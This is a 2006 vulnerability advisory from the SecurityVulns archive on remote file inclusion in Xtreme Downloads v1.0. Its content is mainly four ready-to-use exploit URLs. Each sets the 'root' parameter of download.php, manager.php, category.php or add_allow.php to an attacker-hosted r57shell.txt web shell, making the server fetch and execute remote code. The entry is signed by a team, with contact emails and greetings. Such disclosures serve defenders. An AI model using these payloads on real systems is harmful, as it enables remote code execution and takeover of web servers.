file include in Xtreme Downloads v.1.0

2006-06-07T00:00:00
ID SECURITYVULNS:DOC:13004
Type securityvulns
Reporter Securityvulns
Modified 2006-06-07T00:00:00

Description

Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0
bug found by : sweet-devil team : site-down type : file include

exploits :

download.php

http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?

manager.php

http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?

category.php

http://www.example.com/path/admin\scripts/category.php?root=http://yoursite/r57shell.txt?

add_allow.php

http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?

emails:

gamr-14@hotmail.com & black-cod3@hotmail.com

All my respect to our friends , lezr.com

done .. peace